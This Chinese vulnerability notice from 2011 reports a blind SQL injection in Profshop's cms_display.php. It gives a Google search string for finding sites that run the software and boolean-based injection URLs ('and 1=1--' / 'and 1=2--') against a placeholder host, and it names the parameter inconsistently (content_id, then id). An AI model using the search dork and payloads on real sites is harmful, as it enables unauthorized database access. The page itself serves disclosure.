Profshop SQL 注入漏洞
时间:2011-05-16 来源:秩名
发布日期:2011-05.14
发布作者:佚名
漏洞类型:sql注入、脚本注入、盲注、注入漏洞
漏洞描述:漏洞说明:Profshop (cms_display.php)由于过滤不严,导致sql盲注漏洞。
谷歌关键词:intext:"powered by Profshop.co.uk"
漏洞测试: POC:
http://www.xxx.net/cms_display.php?content_id=3+and+1=1-- [*] 返回正确
http://www.xxx.net/cms_display.php?id=3+and+1=2-- [*] 返回错误
http://www.xxx.net/cms_display.php?id=[SQLI] [*]
POC Demo: http://www.xxx.net/cms_display.php?content_id=3+and+1=1--
标签分类:
相关阅读 更多 +
排行榜 更多 +
